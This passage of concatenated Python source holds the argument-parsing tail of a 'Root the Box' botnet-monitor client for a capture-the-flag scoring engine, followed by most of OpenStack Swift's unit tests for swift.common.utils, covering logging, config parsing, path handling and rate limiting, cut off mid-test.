bot_monitor.stop_thread = True
time.sleep(0.2)
os._exit(0)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Root the Box: Botnet Monitor")
parser.add_argument(
"--version", action="version", version="%(prog)s v" + __version__
)
parser.add_argument(
"--secure",
help="connect using a ssl (default: false)",
action="store_true",
dest="secure",
)
parser.add_argument(
"--domain",
"-d",
help="scoring engine ip address, or domain (default: %s)" % __domain__,
default=__domain__,
dest="domain",
)
parser.add_argument(
"--port",
"-p",
help="network port to connect to (default: %s)" % __port__,
default=__port__,
dest="port",
)
parser.add_argument(
"--log-file",
"-f",
help="log to file (default: %s)" % __log__,
default=__log__,
dest="log_file",
)
parser.add_argument(
"--log-level",
"-l",
help="log to file (default: notset)",
default="notset",
dest="log_level",
)
args = parser.parse_args()
main(args.domain, args.port, args.secure, args.log_file, args.log_level.lower())
|
test_utils.py | # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Tests for swift.common.utils """
from __future__ import with_statement
from test.unit import temptree
import ctypes
import errno
import eventlet
import logging
import os
import random
import re
import socket
import sys
from textwrap import dedent
import threading
import time
import unittest
import fcntl
import shutil
from Queue import Queue, Empty
from getpass import getuser
from shutil import rmtree
from StringIO import StringIO
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from mock import MagicMock, patch
from swift.common.exceptions import (Timeout, MessageTimeout,
ConnectionTimeout, LockTimeout)
from swift.common import utils
from swift.common.swob import Response
class MockOs():
def __init__(self, pass_funcs=[], called_funcs=[], raise_funcs=[]):
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket():
def __init__(self):
self.sent = []
def sendto(self, data, target):
self.sent.append((data, target))
def close(self):
pass
class MockSys():
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
class TestUtils(unittest.TestCase):
""" Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
def test_normalize_timestamp(self):
""" Test swift.common.utils.normalize_timestamp """
self.assertEquals(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEquals(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEquals(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEquals(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEquals(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEquals(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEquals(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEquals(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_backwards(self):
""" Test swift.common.utils.backward """
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = ['123456789x12345678><123456789\n', # block larger than rest
'123456789x123>\n', # block ends just before \n character
'123423456789\n',
'123456789x\n', # block ends at the end of line
'<123456789x123456789x123\n',
'<6789x123\n', # block ends at the beginning of the line
'6789x1234\n',
'1234><234\n', # block ends typically in the middle of line
'123456789x123456789\n']
with TemporaryFile('r+w') as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEquals(line, lines[count].split('\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEquals([], list(utils.backward(f)))
def test_mkdirs(self):
testroot = os.path.join(os.path.dirname(__file__), 'mkdirs')
try:
os.unlink(testroot)
except Exception:
pass
rmtree(testroot, ignore_errors=1)
self.assert_(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assert_(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assert_(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
def test_split_path(self):
""" Test swift.common.utils.split_account_path """
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEquals(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEquals(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEquals(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEquals(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEquals(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEquals(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError, err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError, err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
""" Test swift.common.utils.validate_device_partition """
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError, err:
self.assertEquals(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError, err:
self.assertEquals(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
""" Test swift.common.utils.NullLogger """
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEquals(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo = utils.LoggerFileObject(logger)
print 'test1'
self.assertEquals(sio.getvalue(), '')
sys.stdout = lfo
print 'test2'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo
print >> sys.stderr, 'test4'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
sys.stdout = orig_stdout
print 'test5'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
print >> sys.stderr, 'test6'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
sys.stderr = orig_stderr
print 'test8'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
lfo.writelines(['a', 'b', 'c'])
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\n')
lfo.close()
lfo.write('d')
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo.flush()
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assert_(got_exc)
got_exc = False
try:
for line in lfo.xreadlines():
pass
except Exception:
got_exc = True
self.assert_(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEquals(conf, conf_file)
# assert defaults
self.assertEquals(options['verbose'], False)
self.assert_('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEquals(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEquals(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['verbose'], True)
self.assertEquals(options['once'], True)
self.assertEquals(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assert_('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assert_('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warn('test1')
self.assertEquals(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEquals(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEquals(sio.getvalue(), 'test1\ntest3\n')
# Doesn't really test that the log facility is truly being used all the
# way to syslog; but exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warn('test4')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(((),
{'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEquals(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEquals(strip_value(sio), '')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\n')
self.assertEquals(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\ntest\n')
self.assertEquals(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assert_('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('errno.ECONNREFUSED message test' not in log_msg)
self.assert_('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('ConnectionTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('MessageTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('txn' in log_msg)
self.assert_('12345' in log_msg)
# test no txn on info message
self.assertEquals(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('txn' not in log_msg)
self.assert_('12345' not in log_msg)
# test txn already in message
self.assertEquals(logger.txn_id, '12345')
logger.warn('test 12345 test')
self.assertEquals(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assert_('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('client_ip' in log_msg)
self.assert_('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('client_ip' not in log_msg)
self.assert_('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.warn('test 1.2.3.4 test 12345')
self.assertEquals(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_storage_directory(self):
self.assertEquals(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_whataremyips(self):
myips = utils.whataremyips()
self.assert_(len(myips) > 1)
self.assert_('127.0.0.1' in myips)
def test_hash_path(self):
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
# Yes, these tests are deliberately very fragile. We want to make sure
# that if someones changes the results hash_path produces, they know it
try:
self.assertEquals(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEquals(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEquals(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
finally:
utils.HASH_PATH_PREFIX = _prefix
def test_load_libc_function(self):
self.assert_(callable(
utils.load_libc_function('printf')))
self.assert_(callable(
utils.load_libc_function('some_not_real_function')))
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
with open('/tmp/test', 'wb') as f:
f.write(conf)
make_filename = lambda: '/tmp/test'
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEquals(result, expected)
self.assertRaises(SystemExit, utils.readconf, '/tmp/test', 'section3')
os.unlink('/tmp/test')
self.assertRaises(SystemExit, utils.readconf, '/tmp/test')
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
with open('/tmp/test', 'wb') as f:
f.write(conf)
make_filename = lambda: '/tmp/test'
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEquals(result, expected)
os.unlink('/tmp/test')
self.assertRaises(SystemExit, utils.readconf, '/tmp/test')
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEquals(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEquals(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
import pwd
self.assertEquals(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds)
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, [])
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assert_(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
reset_loggers()
finally:
utils.sys = _orig_sys
utils.os = _orig_os
def test_get_logger_console(self):
reset_loggers()
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assert_(console_handlers)
# make sure you can't have two console handlers
self.assertEquals(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEquals(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEquals(new_handler, old_handler)
reset_loggers()
def test_ratelimit_sleep(self):
running_time = 0
start = time.time()
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.assertTrue(abs((time.time() - start) * 100) < 1)
running_time = 0
start = time.time()
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(25 - (time.time() - start) * 100) < 10)
def test_ratelimit_sleep_with_incr(self):
running_time = 0
start = time.time()
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 250 (with no -1)
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertTrue(abs(50 - (time.time() - start) * 100) < 10)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEquals(parsed.scheme, 'http')
self.assertEquals(parsed.hostname, '127.0.0.1')
self.assertEquals(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEquals(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEquals(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEquals(parsed.hostname, '::1')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEquals(parsed.hostname, '')
def test_ratelimit_sleep_with_sleep(self):
running_time = 0
start = time.time()
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(100 - (time.time() - start) * 100) < 10)
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEquals(len(asdf), 1)
self.assertEquals(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEquals(len(app_bins), 2)
self.assertEquals(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEquals(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEquals(len(sub_ini), 1)
self.assertEquals(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt'
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEquals(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assert_(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
